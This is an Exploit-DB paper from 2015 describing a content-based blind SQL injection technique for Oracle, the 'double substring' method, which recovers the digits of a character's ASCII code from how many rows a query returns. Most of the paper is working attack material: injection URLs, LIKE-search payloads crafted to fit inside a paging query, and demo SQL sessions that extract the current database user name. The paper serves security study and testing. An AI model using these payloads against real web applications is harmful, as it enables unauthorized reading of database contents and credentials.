Content-Based Blind Injection Using By Double Substring

EDB-ID:

38293

CVE:

N/A

EDB Verified:

Author:

zamteng

Type:

papers

Exploit:   /  

Platform:

Multiple

Date:

2015-09-23

Vulnerable App: 
####################################################################
# Title: Content-based Blind Injection Using By Double Substring
# Date: 2015.09.23
# Author: zamteng [jang6263@gmail.com]
# Vendor Homepage: hackerstory.org
# Tested on: Oracle 10g Express Edition Release 10.2.0.1.0
####################################################################


####################################################################
# [0] Basic Concepts
####################################################################
Blind SQL injection is a type of SQL Injection attack that asks 
the database true or false questions and determines the answer 
based on the applications response (Content-based, Time-based)
In generally, Content-based Blind SQL injection should have the data
# Example Of Content-based Blind SQL injection
http://localhost/test.jsp?keyword=1 and 1=1 [TRUE - One or more output]
http://localhost/test.jsp?keyword=1 and 1=2 [FALSE - No output]

If the data is more than the nine, using the Double Substring can attack
# Example Of Content-based Blind Injection Using By Double Substring
http://localhost/test.jsp?keyword=1 and 1=1 [TRUE - Nine or more output]
http://localhost/test.jsp?keyword=1 and 1=2 [FALSE - No output]

# The Comparison of ascii code size(larger or smaller) need 7 requests
# The shift(bitand) operation need 7 requests (link - https://www.exploit-db.com/papers/17073/)
# The Double Substring Attack need 2 or 3 requests (Most DBMS capable of pagin query)

####################################################################
# [1] Content-based Blind Injection Using By Double Substring
####################################################################
http://localhost/test.jsp?keyword=1 and rownum <= (substr(ascii(substr(user,1,1)),1,1))--
# The result count is eight

http://localhost/test.jsp?keyword=1 and rownum <= (substr(ascii(substr(user,1,1)),2,1))--
# The result count is three

# CURRENT DATABASE USER NAME's first character is 'S'
# You can find out one character through  twice or three times Request

####################################################################
# [2] Sample Source
####################################################################
It was tested on Oracle XE 10.2.0.1.0

# create TABLE
SQL> create table t_user (id number(4), name varchar2(30));


# insert DATA
SQL> insert into t_user values(1,'janghw01');
SQL> insert into t_user values(2,'janghw02');
SQL> insert into t_user values(3,'janghw03');
SQL> insert into t_user values(4,'janghw04');
SQL> insert into t_user values(5,'janghw05');
SQL> insert into t_user values(6,'janghw06');
SQL> insert into t_user values(7,'janghw07');
SQL> insert into t_user values(8,'janghw08');
SQL> insert into t_user values(9,'janghw09');
SQL> commit;

# current database user name (by Oracle)
SQL> select user from dual;

USER
------------------------------------------------------------
SYSTEM

# current database user name's first ascii character
SQL> select ascii(substr(user,1,1)) from dual;

ASCII(SUBSTR(USER,1,1))
-----------------------
                     83

# first ascii character's total count
SQL> select * from t_user where 1=1 and rownum <= (substr(ascii(substr(user,1,1)),1,1));

        ID NAME
---------- ------------------------------------------------------------
         1 janghw01
         2 janghw02
         3 janghw03
         4 janghw04
         5 janghw05
         6 janghw06
         7 janghw07
         8 janghw08

8 rows selected.

# second ascii character's total count
SQL> select * from t_user where 1=1 and rownum <= (substr(ascii(substr(user,1,1)),2,1));

        ID NAME
---------- ------------------------------------------------------------
         1 janghw01
         2 janghw02
         3 janghw03


####################################################################
# [3] Attack Examples
####################################################################
# request in like search
http://localhost/test.jsp?keyword=%' and rownum <= (substr(ascii(substr(user,1,1)),1,1)) and '%'='
http://localhost/test.jsp?keyword=%' and rownum <= (substr(ascii(substr(user,1,1)),2,1)) and '%'='

# sample paging query (must be nine or more count output)
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%[keyword]%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1

# sample paging query(result is 8 count) - The first ascii code of the first character is 8
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%%' and rownum <= (substr(ascii(substr(user,1,1)),1,1)) and '%'='%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1

# sample paging query(result is 3 count) - The secode ascii code of the first character is 3
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%%' and rownum <= (substr(ascii(substr(user,1,1)),2,1)) and '%'='%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services